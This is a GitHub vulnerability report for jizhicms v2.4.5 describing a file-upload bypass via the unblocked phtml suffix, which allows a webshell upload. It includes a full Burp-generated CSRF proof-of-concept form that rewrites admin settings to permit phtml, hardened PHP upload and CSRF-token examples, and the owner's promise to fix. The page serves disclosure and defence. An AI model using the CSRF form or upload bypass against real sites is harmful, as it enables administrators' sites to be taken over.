jizhicms v2.4.5 has a file upload vulnerability and a CSRF vulnerability #85

Closed
1y0ng opened this issue Feb 24, 2023 · 1 comment

@1y0ng

1y0ng commented Feb 24, 2023

The file upload vulnerability, file address:
\app\admin\c\CommonController.php
It can be seen that uploads uses a blacklist-and-whitelist check on the suffix of uploaded files, but the blacklist lacks a restriction on the suffix phtml, which allows the file upload suffix check to be bypassed.
[screenshot 1]
For users who have logged in to the backend, you can add phtml to the file suffix whitelist, and then you can upload a one-sentence Trojan horse (webshell) with the phtml suffix.
[screenshot 2]

[screenshot 3]
The file is visibly uploaded successfully and the upload path is returned.
[screenshot 4]
Repair method: blacklist phtml files.

The CSRF vulnerability:
After the administrator has logged in, opening the following page will add phtml to the whitelist; other configuration items can also be modified.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:63342/jizhicms/index.php/admins/Sys/index.html" method="POST">
      <input type="hidden" name="web&#95;name" value="�&#158;&#129;�&#135;&#180;CMS�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;" />
      <input type="hidden" name="web&#95;keyword" value="�&#158;&#129;�&#135;&#180;�&#187;��&#171;&#153;&#44;cms&#44;�&#188;&#128;�&#144;cms&#44;�&#133;&#141;�&#180;&#185;cms&#44;cms�&#179;&#187;�&#187;&#159;&#44;phpcms&#44;�&#133;&#141;�&#180;&#185;�&#188;&#129;�&#184;&#154;�&#187;��&#171;&#153;&#44;�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;&#44;�&#188;&#129;�&#184;&#154;cms&#44;jizhicms&#44;�&#158;&#129;�&#135;&#180;cms&#44;�&#187;��&#171;&#153;cms&#44;�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;&#44;�&#158;&#129;�&#135;&#180;�&#141;&#154;�&#174;&#162;&#44;�&#158;&#129;�&#135;&#180;blog&#44;�&#134;&#133;�&#174;&#185;�&#174;&#161;�&#144;&#134;�&#179;&#187;�&#187;&#159;" />
      <input type="hidden" name="web&#95;desc" value="�&#158;&#129;�&#135;&#180;CMS�&#152;&#175;�&#188;&#128;�&#144;�&#133;&#141;�&#180;&#185;�&#154;&#132;PHPCMS�&#189;&#145;�&#171;&#153;�&#134;&#133;�&#174;&#185;�&#174;&#161;�&#144;&#134;�&#179;&#187;�&#187;&#159;�&#188;&#140;�&#151;&#160;�&#149;&#134;�&#184;&#154;�&#142;&#136;�&#157;&#131;�&#188;&#140;�&#174;&#128;�&#141;&#149;�&#152;&#147;�&#148;&#168;�&#188;&#140;�&#143;&#144;�&#190;&#155;�&#184;&#176;�&#175;&#140;�&#154;&#132;�&#143;&#146;�&#187;&#182;�&#188;&#140;�&#184;&#174;�&#130;&#168;�&#174;&#158;�&#142;&#176;�&#155;&#182;�&#159;��&#161;&#128;�&#144;&#173;�&#187;��&#184;&#141;�&#144;&#140;�&#177;&#187;�&#158;&#139;�&#189;&#145;�&#171;&#153;�&#188;&#136;�&#188;&#129;�&#184;&#154;�&#171;&#153;�&#188;&#140;�&#151;&#168;�&#136;&#183;�&#171;&#153;�&#188;&#140;�&#184;�人�&#141;&#154;�&#174;&#162;�&#171;&#153;�&#173;&#137;�&#188;&#137;�&#188;&#140;�&#152;&#175;�&#130;&#168;�&#187;��&#171;&#153;�&#154;&#132;�&#165;&#189;�&#184;&#174;�&#137;&#139;�&#128;&#130;�&#158;&#129;�&#128;&#159;�&#187;��&#171;&#153;�&#188;&#140;�&#176;&#177;�&#128;&#137;�&#158;&#129;�&#135;&#180;CMS�&#128;&#130;" />
      <input type="hidden" name="web&#95;copyright" value="&#64;2020&#45;2099" />
      <input type="hidden" name="web&#95;beian" value="�&#134;&#128;ICP�&#164;&#135;88888�&#143;&#183;" />
      <input type="hidden" name="web&#95;tel" value="0666&#45;8888888" />
      <input type="hidden" name="web&#95;tel&#95;400" value="400&#45;0000&#45;000" />
      <input type="hidden" name="web&#95;qq" value="12345678" />
      <input type="hidden" name="web&#95;email" value="123456&#64;qq&#46;com" />
      <input type="hidden" name="web&#95;address" value="�&#178;&#179;�&#140;&#151;�&#156;&#129;�&#187;&#138;�&#157;&#138;�&#184;&#130;�&#185;&#191;�&#152;&#179;�&#140;�xxx�&#164;&#167;�&#142;&#166;xx�&#165;&#188;001�&#143;&#183;" />
      <input type="hidden" name="web&#95;logo" value="&#47;static&#47;cms&#47;static&#47;images&#47;logo&#46;png" />
      <input type="hidden" name="file" value="" />
      <input type="hidden" name="domain" value="" />
      <input type="hidden" name="mingan" value="" />
      <input type="hidden" name="closeweb" value="0" />
      <input type="hidden" name="closetip" value="�&#138;&#177;�&#173;&#137;�&#188;&#129;�&#175;&#165;�&#171;&#153;�&#130;&#185;�&#183;&#178;�&#187;&#143;�&#162;&#171;�&#174;&#161;�&#144;&#134;�&#145;&#152;�&#129;&#156;�&#173;&#162;�&#191;&#144;�&#161;&#140;�&#188;&#140;�&#175;&#183;�&#129;&#148;�&#179;&#187;�&#174;&#161;�&#144;&#134;�&#145;&#152;�&#134;�&#167;&#163;�&#175;&#166;�&#131;&#133;�&#188;&#129;" />
      <input type="hidden" name="web&#95;phone" value="0" />
      <input type="hidden" name="web&#95;weixin" value="" />
      <input type="hidden" name="pc&#95;template" value="cms" />
      <input type="hidden" name="wap&#95;template" value="cms" />
      <input type="hidden" name="weixin&#95;template" value="cms" />
      <input type="hidden" name="iswap" value="1" />
      <input type="hidden" name="isopenhomeupload" value="1" />
      <input type="hidden" name="isopenhomepower" value="0" />
      <input type="hidden" name="cache&#95;time" value="0" />
      <input type="hidden" name="fileSize" value="0" />
      <input type="hidden" name="fileType" value="pdf&#124;jpg&#124;jpeg&#124;png&#124;zip&#124;rar&#124;gzip&#124;doc&#124;docx&#124;xlsx&#124;phtml" />
      <input type="hidden" name="ueditor&#95;config" value="&quot;fullscreen&quot;&#44;&#32;&quot;source&quot;&#44;&quot;undo&quot;&#44;&#32;&quot;redo&quot;&#44;&quot;bold&quot;&#44;&#32;&quot;italic&quot;&#44;&#32;&quot;underline&quot;&#44;&#32;&quot;fontborder&quot;&#44;&#32;&quot;strikethrough&quot;&#44;&#32;&quot;super&quot;&#44;&#32;&quot;removeformat&quot;&#44;&#32;&quot;formatmatch&quot;&#44;&#32;&quot;autotypeset&quot;&#44;&#32;&quot;blockquote&quot;&#44;&#32;&quot;pasteplain&quot;&#44;&quot;forecolor&quot;&#44;&#32;&quot;backcolor&quot;&#44;&#32;&quot;insertorderedlist&quot;&#44;&#32;&quot;insertunorderedlist&quot;&#44;&#32;&quot;selectall&quot;&#44;&#32;&quot;cleardoc&quot;&#44;&quot;rowspacingtop&quot;&#44;&#32;&quot;rowspacingbottom&quot;&#44;&#32;&quot;lineheight&quot;&#44;&quot;customstyle&quot;&#44;&#32;&quot;paragraph&quot;&#44;&#32;&quot;fontfamily&quot;&#44;&#32;&quot;fontsize&quot;&#44;&quot;directionalityltr&quot;&#44;&#32;&quot;directionalityrtl&quot;&#44;&#32;&quot;indent&quot;&#44;&quot;justifyleft&quot;&#44;&#32;&quot;justifycenter&quot;&#44;&#32;&quot;justifyright&quot;&#44;&#32;&quot;justifyjustify&quot;&#44;&quot;touppercase&quot;&#44;&#32;&quot;tolowercase&quot;&#44;&quot;link&quot;&#44;&#32;&quot;unlink&quot;&#44;&#32;&quot;anchor&quot;&#44;&#32;&quot;imagenone&quot;&#44;&#32;&quot;imageleft&quot;&#44;&#32;&quot;imageright&quot;&#44;&#32;&quot;imagecenter&quot;&#44;&quot;simpleupload&quot;&#44;&#32;&quot;insertimage&quot;&#44;&#32;&quot;emotion&quot;&#44;&#32;&quot;scrawl&quot;&#44;&#32;&quot;insertvideo&quot;&#44;&#32;&quot;music&quot;&#44;&#32;&quot;attachment&quot;&#44;&#32;&quot;map&quot;&#44;&#32;&quot;gmap&quot;&#44;&#32;&quot;insertframe&quot;&#44;&#32;&quot;insertcode&quot;&#44;&#32;&quot;webapp&quot;&#44;&#32;&quot;pagebreak&quot;&#44;&quot;template&quot;&#44;&#32;&quot;background&quot;&#44;&quot;horizontal&quot;&#44;&#32;&quot;date&quot;&#44;&#32;&quot;time&quot;&#44;&#32;&quot;spechars&quot;&#44;&#32;&quot;snapscreen&quot;&#4
4;&#32;&quot;wordimage&quot;&#44;&quot;inserttable&quot;&#44;&#32;&quot;deletetable&quot;&#44;&#32;&quot;insertparagraphbeforetable&quot;&#44;&#32;&quot;insertrow&quot;&#44;&#32;&quot;deleterow&quot;&#44;&#32;&quot;insertcol&quot;&#44;&#32;&quot;deletecol&quot;&#44;&#32;&quot;mergecells&quot;&#44;&#32;&quot;mergeright&quot;&#44;&#32;&quot;mergedown&quot;&#44;&#32;&quot;splittocells&quot;&#44;&#32;&quot;splittorows&quot;&#44;&#32;&quot;splittocols&quot;&#44;&#32;&quot;charts&quot;&#44;&quot;print&quot;&#44;&#32;&quot;preview&quot;&#44;&#32;&quot;searchreplace&quot;&#44;&#32;&quot;help&quot;&#44;&#32;&quot;drafts&quot;" />
      <input type="hidden" name="ueditor&#95;user&#95;config" value="&quot;undo&quot;&#44;&#32;&quot;redo&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;paragraph&quot;&#44;&quot;bold&quot;&#44;&quot;forecolor&quot;&#44;&quot;fontfamily&quot;&#44;&quot;fontsize&quot;&#44;&#32;&quot;italic&quot;&#44;&#32;&quot;blockquote&quot;&#44;&#32;&quot;insertparagraph&quot;&#44;&#32;&quot;justifyleft&quot;&#44;&#32;&quot;justifycenter&quot;&#44;&#32;&quot;justifyright&quot;&#44;&quot;justifyjustify&quot;&#44;&quot;&#124;&quot;&#44;&quot;indent&quot;&#44;&#32;&quot;insertorderedlist&quot;&#44;&#32;&quot;insertunorderedlist&quot;&#44;&quot;&#124;&quot;&#44;&#32;&quot;insertimage&quot;&#44;&#32;&quot;inserttable&quot;&#44;&#32;&quot;deletetable&quot;&#44;&#32;&quot;insertparagraphbeforetable&quot;&#44;&#32;&quot;insertrow&quot;&#44;&#32;&quot;deleterow&quot;&#44;&#32;&quot;insertcol&quot;&#44;&#32;&quot;deletecol&quot;&#44;&quot;mergecells&quot;&#44;&#32;&quot;mergeright&quot;&#44;&#32;&quot;mergedown&quot;&#44;&#32;&quot;splittocells&quot;&#44;&#32;&quot;splittorows&quot;&#44;&#32;&quot;splittocols&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;drafts&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;fullscreen&quot;" />
      <input type="hidden" name="classtypemaxlevel" value="0" />
      <input type="hidden" name="onlyuserupload" value="1" />
      <input type="hidden" name="imagequlity" value="75" />
      <input type="hidden" name="ispngcompress" value="0" />
      <input type="hidden" name="admintpl" value="default" />
      <input type="hidden" name="islevelurl" value="0" />
      <input type="hidden" name="iscachepage" value="1" />
      <input type="hidden" name="isautohtml" value="0" />
      <input type="hidden" name="pc&#95;html" value="&#47;" />
      <input type="hidden" name="mobile&#95;html" value="m" />
      <input type="hidden" name="autocheckmessage" value="0" />
      <input type="hidden" name="autocheckcomment" value="1" />
      <input type="hidden" name="iswatermark" value="0" />
      <input type="hidden" name="watermark&#95;file" value="" />
      <input type="hidden" name="watermark&#95;t" value="9" />
      <input type="hidden" name="watermark&#95;tm" value="0" />
      <input type="hidden" name="admin&#95;save&#95;path" value="static&#47;upload&#47;&#123;yyyy&#125;&#47;&#123;mm&#125;&#47;&#123;dd&#125;" />
      <input type="hidden" name="home&#95;save&#95;path" value="static&#47;upload&#47;&#123;yyyy&#125;&#47;&#123;mm&#125;&#47;&#123;dd&#125;" />
      <input type="hidden" name="isajax" value="0" />
      <input type="hidden" name="isregister" value="1" />
      <input type="hidden" name="onlyinvite" value="0" />
      <input type="hidden" name="release&#95;table" value="article&#124;product" />
      <input type="hidden" name="closehomevercode" value="0" />
      <input type="hidden" name="closeadminvercode" value="0" />
      <input type="hidden" name="tag&#95;table" value="article&#124;product" />
      <input type="hidden" name="isdebug" value="1" />
      <input type="hidden" name="closesession" value="0" />
      <input type="hidden" name="messageyzm" value="1" />
      <input type="hidden" name="homerelease" value="1" />
      <input type="hidden" name="hideclasspath" value="0" />
      <input type="hidden" name="hidetitleonliy" value="article&#45;title&#124;product&#45;title" />
      <input type="hidden" name="cachefilenum" value="100" />
      <input type="hidden" name="search&#95;table" value="article&#124;product" />
      <input type="hidden" name="search&#95;words" value="title" />
      <input type="hidden" name="search&#95;words&#95;muti" value="title" />
      <input type="hidden" name="search&#95;table&#95;muti" value="article&#124;product" />
      <input type="hidden" name="search&#95;fields&#95;muti" value="id&#44;tid&#44;litpic&#44;title&#44;tags&#44;keywords&#44;molds&#44;htmlurl&#44;description&#44;addtime&#44;userid&#44;member&#95;id&#44;hits&#44;ownurl&#44;target" />
      <input type="hidden" name="email&#95;server" value="smtp&#46;163&#46;com" />
      <input type="hidden" name="email&#95;port" value="465" />
      <input type="hidden" name="shou&#95;email" value="" />
      <input type="hidden" name="send&#95;email" value="" />
      <input type="hidden" name="send&#95;pass" value="" />
      <input type="hidden" name="send&#95;name" value="�&#158;&#129;�&#135;&#180;�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;" />
      <input type="hidden" name="tj&#95;msg" value="�&#176;&#138;�&#149;&#172;�&#154;&#132;&#123;xxx&#125;�&#188;&#140;�&#136;&#145;�&#187;&#172;�&#183;&#178;�&#187;&#143;�&#148;&#182;�&#136;&#176;�&#130;&#168;�&#154;&#132;�&#174;&#162;�&#141;&#149;�&#188;&#129;�&#175;&#183;�&#149;&#153;�&#132;&#143;�&#130;&#168;�&#154;&#132;�&#148;��&#173;&#144;�&#130;&#174;�&#187;&#182;�&#187;&#165;�&#142;&#183;�&#190;&#151;�&#156;&#128;�&#150;&#176;�&#182;&#136;�&#129;&#175;�&#188;&#140;�&#176;&#162;�&#176;&#162;�&#130;&#168;�&#188;&#129;" />
      <input type="hidden" name="send&#95;msg" value="�&#176;&#138;�&#149;&#172;�&#154;&#132;&#123;xxx&#125;�&#188;&#140;�&#136;&#145;�&#187;&#172;�&#183;&#178;�&#161;&#174;�&#174;&#164;�&#134;�&#130;&#168;�&#154;&#132;�&#174;&#162;�&#141;&#149;�&#188;&#140;�&#175;&#183;�&#142;3�&#151;&#165;�&#134;&#133;�&#177;&#135;�&#172;&#190;�&#188;&#140;�&#128;&#190;�&#156;&#159;�&#129;&#149;�&#184;&#141;�&#191;&#157;�&#149;&#153;�&#188;&#140;�&#184;&#141;�&#190;&#191;�&#175;&#183;�&#167;&#129;�&#176;&#133;�&#128;&#130;�&#177;&#135;�&#172;&#190;�&#174;&#140;�&#136;&#144;�&#144;&#142;�&#188;&#140;�&#131;&#166;�&#175;&#183;�&#145;&#138;�&#159;&#165;�&#174;&#162;�&#156;&#141;人�&#145;&#152;�&#130;&#168;�&#154;&#132;�&#164;�&#152;&#147;�&#180;&#166;�&#143;&#183;�&#144;&#142;�&#148;�&#189;&#141;�&#188;&#140;�&#141;&#179;�&#174;&#140;�&#136;&#144;�&#184;&#139;�&#141;&#149;�&#137;&#139;�&#187;&#173;�&#188;&#140;�&#176;&#162;�&#176;&#162;�&#130;&#168;�&#128;&#130;" />
      <input type="hidden" name="yunfei" value="0&#46;00" />
      <input type="hidden" name="overtime" value="4" />
      <input type="hidden" name="isopenemail" value="1" />
      <input type="hidden" name="paytype" value="0" />
      <input type="hidden" name="alipay&#95;partner" value="" />
      <input type="hidden" name="alipay&#95;key" value="" />
      <input type="hidden" name="alipay&#95;private&#95;key" value="" />
      <input type="hidden" name="alipay&#95;public&#95;key" value="" />
      <input type="hidden" name="wx&#95;mchid" value="" />
      <input type="hidden" name="wx&#95;key" value="" />
      <input type="hidden" name="wx&#95;appid" value="" />
      <input type="hidden" name="wx&#95;appsecret" value="" />
      <input type="hidden" name="wx&#95;client&#95;cert" value="" />
      <input type="hidden" name="wx&#95;client&#95;key" value="" />
      <input type="hidden" name="wx&#95;token" value="" />
      <input type="hidden" name="money&#95;exchange" value="1" />
      <input type="hidden" name="jifen&#95;exchange" value="100" />
      <input type="hidden" name="isopenjifen" value="1" />
      <input type="hidden" name="isopenqianbao" value="1" />
      <input type="hidden" name="isopenweixin" value="1" />
      <input type="hidden" name="isopenzfb" value="1" />
      <input type="hidden" name="isopendmf" value="1" />
      <input type="hidden" name="wx&#95;login&#95;appid" value="" />
      <input type="hidden" name="wx&#95;login&#95;appsecret" value="" />
      <input type="hidden" name="wx&#95;login&#95;token" value="" />
      <input type="hidden" name="huanying" value="�&#172;&#162;�&#191;&#142;�&#133;&#179;�&#179;&#168;�&#133;&#172;�&#188;&#151;�&#143;&#183;&#126;" />
      <input type="hidden" name="login&#95;award" value="1" />
      <input type="hidden" name="login&#95;award&#95;open" value="1" />
      <input type="hidden" name="release&#95;award&#95;open" value="1" />
      <input type="hidden" name="release&#95;award" value="1" />
      <input type="hidden" name="release&#95;max&#95;award" value="0" />
      <input type="hidden" name="collect&#95;award&#95;open" value="1" />
      <input type="hidden" name="collect&#95;award" value="1" />
      <input type="hidden" name="collect&#95;max&#95;award" value="1000" />
      <input type="hidden" name="likes&#95;award&#95;open" value="1" />
      <input type="hidden" name="likes&#95;award" value="1" />
      <input type="hidden" name="likes&#95;max&#95;award" value="1000" />
      <input type="hidden" name="comment&#95;award&#95;open" value="1" />
      <input type="hidden" name="comment&#95;award" value="1" />
      <input type="hidden" name="comment&#95;max&#95;award" value="1000" />
      <input type="hidden" name="follow&#95;award&#95;open" value="1" />
      <input type="hidden" name="follow&#95;award" value="1" />
      <input type="hidden" name="follow&#95;max&#95;award" value="1000" />
      <input type="hidden" name="invite&#95;award&#95;open" value="0" />
      <input type="hidden" name="invite&#95;type" value="jifen" />
      <input type="hidden" name="invite&#95;award" value="0" />
      <input type="hidden" name="custom&#95;type" value="0" />
      <input type="hidden" name="custom&#95;title" value="" />
      <input type="hidden" name="custom&#95;fields" value="" />
      <input type="hidden" name="custom&#95;ctype" value="1" />
      <input type="hidden" name="custom&#95;tips" value="" />
      <input type="hidden" name="custom&#95;config" value="" />
      <input type="hidden" name="custom&#95;new&#95;title" value="" />
      <input type="hidden" name="custom&#95;new&#95;fields" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
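The upload finding comes down to the order and completeness of the two suffix checks. The block below is an added example, not jizhicms code and not the reporter's: it models the check the report describes (admin-editable whitelist consulted first, a blacklist that does not contain phtml as a backstop) beside a hardened version in which the blacklist covers every suffix a typical PHP handler mapping executes, is applied case-insensitively to every dot-separated segment, and cannot be overridden by the whitelist. The function names, the two blacklists and the sample filenames are constructed assumptions; the whitelist is the `fileType` value from the PoC form above.

```php
<?php
// Added example (not jizhicms code). Names and lists below are hypothetical.

// Constructed blacklist in the shape the report describes: phtml is absent.
const OLD_BLACKLIST = ['php', 'php3', 'php4', 'php5', 'asp', 'aspx', 'jsp', 'exe', 'sh'];

// Hardened blacklist: every suffix commonly mapped to the PHP handler, plus
// server control files. Align this with your own AddHandler / FilesMatch /
// "location ~ \.php$" configuration; the list only helps if it matches what
// the web server actually executes.
const HARDENED_BLACKLIST = [
    'php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phps', 'pht', 'phtml', 'phar',
    'inc', 'asp', 'aspx', 'jsp', 'exe', 'sh', 'htaccess',
];

// Vulnerable shape: whitelist decides, blacklist is only a backstop and is
// missing phtml, so an admin-added "phtml" whitelist entry passes.
function isAllowedOld(string $filename, array $whitelist): bool
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return in_array($ext, $whitelist, true) && !in_array($ext, OLD_BLACKLIST, true);
}

// Hardened: normalise the name, then reject if ANY extension segment is
// blacklisted (catches "x.php.jpg" under Apache multi-extension handling and
// trailing-dot tricks), and only then consult the whitelist on the last one.
function isAllowedHardened(string $filename, array $whitelist): bool
{
    $base = strtolower(basename(str_replace('\\', '/', $filename)));
    $base = rtrim($base, ". ");              // "shell.pht." -> "shell.pht"
    $parts = explode('.', $base);
    if (count($parts) < 2) {
        return false;                        // no extension at all
    }
    array_shift($parts);                     // drop the base name
    foreach ($parts as $segment) {
        if ($segment === '' || in_array($segment, HARDENED_BLACKLIST, true)) {
            return false;                    // blacklist wins over any whitelist
        }
    }
    $ext = end($parts);
    return in_array($ext, array_map('strtolower', $whitelist), true);
}

// Whitelist exactly as submitted by the CSRF PoC (fileType field).
$whitelist = explode('|', 'pdf|jpg|jpeg|png|zip|rar|gzip|doc|docx|xlsx|phtml');

// Constructed sample names: a benign upload and a few shapes the old check passes.
foreach (['report.pdf', 'shell.phtml', 'SHELL.PHTML', 'photo.php.jpg', 'notes.pht.'] as $name) {
    printf(
        "%-15s old=%-5s hardened=%s\n",
        $name,
        var_export(isAllowedOld($name, $whitelist), true),
        var_export(isAllowedHardened($name, $whitelist), true)
    );
}
```

Run with `php upload_check.php`: only `report.pdf` survives the hardened check, while the old check also accepts `shell.phtml`, its upper-case variant and `photo.php.jpg`. A blacklist that is ordered before the whitelist and that cannot be edited from the admin UI is the part that actually closes the report; storing uploads under a directory with script execution disabled is the usual second layer.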
@Cherry-toto
Owner

Thank you very much. I will fix this vulnerability in the next version.
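The CSRF finding is closed by tying every state-changing admin POST to a secret the attacker's page cannot read. The block below is an added example of a synchronizer-token check for a form like the settings page in the PoC; it is not jizhicms code and not the fix the owner shipped. The function names, the session key, the `_token` field name and the site origin are assumptions.

```php
<?php
// Added example (not jizhicms code): per-session CSRF token for admin POSTs.
// CSRF_SESSION_KEY, the "_token" field and SITE_ORIGIN are hypothetical names.

const CSRF_SESSION_KEY = '_csrf_token';
const SITE_ORIGIN      = 'https://admin.example.com';   // placeholder origin

function ensureSession(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
}

// Returns the session's token, minting a 256-bit random one on first use.
function csrfToken(): string
{
    ensureSession();
    if (empty($_SESSION[CSRF_SESSION_KEY])) {
        $_SESSION[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $_SESSION[CSRF_SESSION_KEY];
}

// Hidden field to embed in every admin form that changes state.
function csrfField(): string
{
    return '<input type="hidden" name="_token" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

// Verify a submitted form. $originHeader is the request's Origin header or
// null when the browser did not send one.
function csrfCheck(array $post, ?string $originHeader): bool
{
    ensureSession();
    $expected = $_SESSION[CSRF_SESSION_KEY] ?? '';
    $given    = $post['_token'] ?? '';
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return false;                        // constant-time compare, no token = fail
    }
    // Defence in depth: a form auto-submitted from another site carries that
    // site's Origin, which cannot be spoofed by page script.
    if ($originHeader !== null && $originHeader !== SITE_ORIGIN) {
        return false;
    }
    return true;
}

// Controller skeleton (hypothetical) for the settings handler:
//   if ($_SERVER['REQUEST_METHOD'] === 'POST') {
//       if (!csrfCheck($_POST, $_SERVER['HTTP_ORIGIN'] ?? null)) {
//           http_response_code(403);
//           exit('invalid CSRF token');
//       }
//       saveSettings($_POST);
//   }

// Constructed self-check: a legitimate submission passes, a cross-site one does not.
$token = csrfToken();
var_dump(csrfCheck(['_token' => $token], SITE_ORIGIN));                 // valid token, same origin
var_dump(csrfCheck(['fileType' => 'pdf|phtml'], 'http://attacker.invalid')); // no token (the PoC's shape)
var_dump(csrfCheck(['_token' => $token], 'http://attacker.invalid'));    // token leaked but foreign Origin
```

Setting the admin session cookie with `SameSite=Lax` or `Strict` (via `session_set_cookie_params`) is a cheap additional layer: a top-level cross-site POST like the Burp-generated page then arrives without the session cookie at all, so the request is unauthenticated before the token is even checked.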
